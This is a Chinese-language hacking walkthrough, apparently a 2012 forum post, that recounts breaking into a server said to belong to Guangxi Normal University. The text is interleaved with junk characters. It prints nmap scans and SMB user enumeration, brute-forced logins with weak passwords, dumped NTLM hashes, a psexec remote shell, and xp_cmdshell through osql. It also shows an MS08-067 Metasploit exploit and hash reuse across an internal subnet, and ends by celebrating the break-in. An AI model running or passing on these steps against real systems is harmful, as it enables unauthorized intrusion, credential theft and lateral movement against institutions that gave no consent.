nmap+msf入侵广西师范

admin

广西师范网站http://202.103.242.241/
+ v6 t( L- D! v
. K5 P+ O/ A# M1 Iroot@bt:~# nmap -sS -sV 202.103.242.241
/ |" q8 i! h/ ^) Z7 u" k
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST

- W6 j. ?- I# o7 P) ~Nmap scan report for bogon (202.103.242.241)
5 m/ {6 Z0 H$ e# }  ]2 D' I+ G$ l
Host is up (0.00048s latency).
! c* m) v; X2 S7 R0 J4 q7 `! [1 Z
' f4 l/ U3 N1 {! W8 Y6 H, i0 s8 bNot shown: 993 closed ports

% @" O) h' B3 v9 pPORT     STATE SERVICE       VERSION

135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)

" |( j5 e- u0 z7 T139/tcp  open  netbios-ssn
  S- ]1 @' z% O7 s7 P. `
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
; d$ w5 V3 |5 j+ i2 X0 I8 v
1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)

- H/ ], z7 A" Y1026/tcp open  msrpc         Microsoft Windows RPC
; Q% q$ Q: j: t
0 |: J& e/ C1 n+ F* w3372/tcp open  msdtc?
, g2 l$ B6 q; ?9 [
4 {) m, J" F. |4 S& C  R" C+ l3389/tcp open  ms-term-serv?

/ ?0 ~% T7 o$ S( w; z2 X/ a$ \1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
2 ~. d, j. c: G3 c5 ISF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r

# a8 c. T7 z! U6 h: }) T& z1 ASFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
% q6 v0 [3 K, x. @# L8 C, e
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)

SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO

SF:ptions,6,”hO\n\x000Z”);

/ t8 W" |# t0 A# ?0 G5 ]( E6 S8 IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Service Info: OS: Windows

; H8 G# K+ G: h0 s# C/ }Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
4 R# c5 a& ]# W
, `  k0 [0 E/ x6 U+ d-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
0 W1 t. J( v3 E1 e5 M, d
% ]1 v* r; x. s6 @, M/ C-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
1 k) n, c0 v& G* U+ i0 Z! t
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
8 n9 u+ D% B1 b4 G) A3 W
8 x+ s7 i' |% n) ?-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
4 E- k% P9 E1 g
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse

-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
. F. j8 I# J! T- y  j
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
, A' z0 e, [$ ]) E7 S" w
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse

-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse

-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
! I! A/ h3 C5 A; u
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
" M$ o  o3 g: }" i; L! k8 o
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
: N& n! {- j5 {7 ], U
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse

-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse

& K) D! N5 _) j+ t0 a- o$ X1 [-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

: O, U5 \3 |; Q/ troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
! n6 t( I6 D# f8 r& E* N3 P$ z3 q
2 C: d# ]4 s/ [4 |/ Q+ J: ]" I9 m//此乃使用脚本扫描远程机器所存在的账户名
  H% g+ o3 g! N) ]
' L* }5 h' M" I! VStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
% Y* ?9 A% ^6 [& k- i
Nmap scan report for bogon (202.103.242.241)
0 @  \8 v( `$ J: x
Host is up (0.00038s latency).
4 d! q, `( A0 F2 n( L  f
Not shown: 993 closed ports
6 P% V2 D& ?! Q$ K' d5 X' Q
" g7 c. `1 E/ l& @' W. N8 p* XPORT     STATE SERVICE

; l# _  W$ B; ^135/tcp  open  msrpc

- E% x# U- f* u139/tcp  open  netbios-ssn
; x2 c9 \2 \$ x& \% V  n: v: m$ }
- B7 E; ^- _7 w445/tcp  open  microsoft-ds

: c2 R# a- \0 k8 l1025/tcp open  NFS-or-IIS

2 J+ y% U3 o. Y1026/tcp open  LSA-or-nterm
8 z& y9 g& o1 p; n
3372/tcp open  msdtc

! D- ?6 w( m" `( ?; D3389/tcp open  ms-term-serv

5 ]5 y7 r% \9 u5 `4 p. [' b5 RMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 N+ o! z& z& i& D. H6 H
% P, D  w( t* p: HHost script results:
6 _* L$ W; t' [3 C8 ~
| smb-enum-users:
9 T$ p1 e. c+ g4 J0 k
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
8 m2 x. \  @2 D$ ~0 R
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

' O; m5 u  L: C$ ?$ w3 L- I' k( V1 groot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
( }! e. N# n" Z! J! r/ a. J( p# d
//查看共享

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
1 M+ k' O  @# l* [0 Z
Nmap scan report for bogon (202.103.242.241)

: Z$ S. ~& q' D" T! MHost is up (0.00035s latency).
( }, S* z6 Y' @
1 d+ q2 q7 \' f+ L  ?: M  ^Not shown: 993 closed ports

2 B3 G  R( {/ r" o$ m0 wPORT     STATE SERVICE

9 W$ B7 `* f/ m+ |9 r8 {2 }135/tcp  open  msrpc
+ R! ]8 h  X4 W. J: L6 t& D
6 y. o/ x- }1 e139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

; ~5 V- \- V; U9 _& C2 S1025/tcp open  NFS-or-IIS
& ~  |) K- ]3 o/ @
( _; {3 D* p+ Y7 [9 m- Y1026/tcp open  LSA-or-nterm
7 O) I8 C2 O* s5 n1 Q8 z' e
3372/tcp open  msdtc
1 d2 q# M# Z& Z) o/ N- i( b
3389/tcp open  ms-term-serv

; g6 o& v; I. ]' b6 c8 M1 qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
  x- G& ~  ^4 X: P/ |
* `0 N. H7 K, D  k+ LHost script results:
6 l/ F2 @6 \6 u9 v
| smb-enum-shares:

# Z' m' S2 F! S% ?! B/ {|   ADMIN$
- c& s: V' E; q# }0 E
|     Anonymous access: <none>

|   C$
5 a7 C) H9 k5 s) [2 x' b, l
|     Anonymous access: <none>
; t$ q" |9 i- n0 v- h1 ^
5 \' T& _- s5 O$ ?9 }" F|   IPC$
" o) R; G% W3 t* @- t8 ]
|_    Anonymous access: READ

1 Y/ L2 c. `" @Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

* g0 E: P  Q2 ~root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      

  E) r- ~  L" f//获取用户密码

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
6 H# i/ [4 k0 [2 ^  g) \5 g1 U4 Q
: B! Y) o; y) w" RNmap scan report for bogon (202.103.242.2418)
! k7 D& ~2 p3 ^8 u7 T
Host is up (0.00041s latency).

4 N0 I: u  q/ s2 B) e7 y( _! O! ~, cNot shown: 993 closed ports
' I9 n3 d9 S" k+ A* X/ n
2 X5 m7 H" [9 @6 O9 DPORT     STATE SERVICE

9 Z/ H& L0 f$ u  i135/tcp  open  msrpc

3 j& {+ t4 v/ s' \139/tcp  open  netbios-ssn

$ _. h5 b! p* Z' j% @" w7 X6 k- w! b8 ~445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

3372/tcp open  msdtc
! y( r% N5 c, D* j8 L( S( z
3389/tcp open  ms-term-serv
9 j. `  J' }5 r3 w: J' e9 n; y$ r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-brute:
2 n$ L. d3 t# S" j
administrator:<blank> => Login was successful

5 Y0 N* P$ O& r8 r  ~|_  test:123456 => Login was successful
" _- ?/ P! U0 B- [9 x& G% V( A
, z& i' A! O/ DNmap done: 1 IP address (1 host up) scanned in 28.22 seconds

1 z8 [( `  Z/ k1 T3 hroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash

( g" h/ A/ G' J5 O- g, u* croot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
- ^" y5 V  m6 S0 ^* w* i# X2 S+ W+ ~
% \& e/ }1 a) r6 a) Eroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

7 `& ^( y; R/ E$ l& L$ i; jroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
% U1 {6 s, I' i- q% f6 E
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST

/ Z* f3 P3 I' k' ?Nmap scan report for bogon (202.103.242.241)

Host is up (0.0012s latency).
0 \% D$ m: {& A) I  I
PORT    STATE SERVICE

135/tcp open  msrpc

0 U4 ?2 \# [( k1 `$ o  j, l139/tcp open  netbios-ssn
7 a* n/ j3 H: j
/ v! Z2 P8 t$ z" X* [( z2 k3 D0 L) z445/tcp open  microsoft-ds
* p5 [+ l8 Y5 f1 `
( C4 y2 w! A* @  D' K& vMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, e, ]* w( b) O
Host script results:
, y+ x( q* m* P, {  I
| smb-pwdump:

& J: X8 l* y; h7 B+ F| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************

6 i- X, J) B) b1 |  @* ?| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************

| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
; b( X; |' y. s# Y* W# l# M
# O$ k3 ~5 h7 u+ O4 c% I6 V% ||_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
2 e0 t6 Y. w% [
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
$ m+ Q" T8 A& I$ E& y
2 \9 J( ?, j! B/ V7 @C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell

-p 123456 -e cmd.exe

PsExec v1.55 – Execute processes remotely
) z) J0 s, Z$ C& F+ b& B9 {& c
Copyright (C) 2001-2004 Mark Russinovich
0 |; j- t1 u/ a7 N
Sysinternals – www.sysinternals.com
# V, t6 t. t8 G
) A4 s: d( T% v: f% RMicrosoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

4 O$ b& Y! F5 c8 tC:\WINNT\system32>ipconfig
  I" B4 S% D) w! U
9 w" K# j# S& S7 }5 o' ~/ v; e. _Windows 2000 IP Configuration
7 F% v' i1 a* n  v! j9 T
3 t. U7 P3 S: B0 |# L7 oEthernet adapter 本地连接:

Connection-specific DNS Suffix  . :

IP Address. . . . . . . . . . . . : 202.103.242.241

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 202.103.1.1
, ~$ B- M+ n. f- q- @' b4 a( M
7 B6 ?) C+ f+ l% @! E' }6 u+ C. y  _C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell ＇net user＇ “   //远程登录sa执行命令

: \$ \2 V0 [# \" xroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
" C( {5 V! f3 E! p- |# M
Nmap scan report for bogon (202.103.242.241)
1 y- N$ @' G/ Y5 \2 L, X
Host is up (0.00046s latency).

Not shown: 993 closed ports

0 w0 Z& Q) H& E/ z" wPORT     STATE SERVICE

135/tcp  open  msrpc
; h4 p/ u  {. o6 `, f; T
3 u$ O; l4 n* l) A139/tcp  open  netbios-ssn

- k, ^- @! E4 O6 G( ]2 r( [+ }- R, q445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

3 P& R* p  j, g; q1026/tcp open  LSA-or-nterm

8 r7 O( e! J, n' l6 K# \3372/tcp open  msdtc

. q, I+ I1 o" d$ k; J7 x! n$ C1 P: Q3389/tcp open  ms-term-serv
0 I. ]$ Y: ^! m6 e! W: V8 ?
6 E2 {8 Z1 Q4 a, v& K6 X, hMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) s, Y: `1 z9 e) U& O/ f& h
Host script results:

/ ~* c: z5 |) P$ L, Z# \# H| smb-check-vulns:
* W, b. U+ _" h7 U* B: v7 d5 D9 M
|_  MS08-067: VULNERABLE

5 A/ G/ {! J  v; M+ B5 ONmap done: 1 IP address (1 host up) scanned in 1.43 seconds
4 n) P* l: W9 }* M
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出
2 O9 \  g( u8 J( y! Y; z0 F3 r
" \& W& o) v6 Z5 O6 M( k/ wmsf > search ms08
$ C& [$ K, O( @/ R8 M7 N% z# v
msf > use exploit/windows/smb/ms08_067_netapi

0 g. B) \+ E; J/ g/ G5 y5 l3 cmsf  exploit(ms08_067_netapi) > show options

msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
4 Q1 I% j* O6 Q9 L
7 O0 w# Z' f" o: f( Rmsf  exploit(ms08_067_netapi) > show payloads
7 z9 I* u. z& A) R7 D; O) `
- q& Q0 J3 }) r4 Amsf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
; u. u( B$ ]5 F$ N" C- d# x( O
( J+ I; `% Z9 j. o9 Dmsf  exploit(ms08_067_netapi) > exploit
% B& B6 \9 \& g6 `
* u. M3 D9 x5 p8 n" w* p5 {2 rmeterpreter >
' V9 ]( D1 T' l
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
0 k+ d* m& V  l# o( J* ]2 i# F, X. W
test
1 k' J! ?) i8 Q2 r9 A
! @0 q! Z/ Y0 ^9 V0 qadministrator

- B1 h) Z4 z0 Q# v/ ?' Rroot@bt:/usr/local/share/nmap/scripts# vim password.txt
' R* r4 b6 B- U( y! [& O
4 @% w- G, ?- J44EFCE164AB921CAAAD3B435B51404EE
0 a3 j. Q3 k! u' f
/ e8 M: z" e, n7 l/ F. h. @/ z  l+ Oroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

$ m( f( u- J5 {$ c //利用用户名跟获取的hash尝试对整段内网进行登录

- I' D* r! m- |5 c0 O* ^Nmap scan report for 192.168.1.105

0 n9 m1 }" l7 {3 \Host is up (0.00088s latency).

Not shown: 993 closed ports

3 D* N7 d. ~; K" H' _! C( G7 MPORT     STATE SERVICE

135/tcp  open  msrpc
/ A2 ~, J) a% y: _; C  x* a
+ E2 X+ q$ z0 u, v139/tcp  open  netbios-ssn
% U7 d, h# P; w- X
445/tcp  open  microsoft-ds
/ u$ m- r+ K( T
1025/tcp open  NFS-or-IIS
. k$ |. ?/ }) g  M5 g
& D+ G3 H$ f! a2 U1026/tcp open  LSA-or-nterm

) Q- K, }) J/ G3 H. A& ]9 f$ n3372/tcp open  msdtc
4 Q* p& n5 h+ ~( `2 {
3389/tcp open  ms-term-serv
  V) G/ ^8 o& f1 v+ g
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:

| smb-brute:
2 W" u& G) k5 y/ _- \$ E7 q4 F
+ J" @8 b* u! K* ?9 n; d- c|_  administrator:<blank> => Login was successful
0 P* G. E* n3 Q* g: J, M' j
6 I  i3 ?, Y8 {; |5 \6 K4 s0 |攻击成功，一个简单的msf+nmap攻击~~·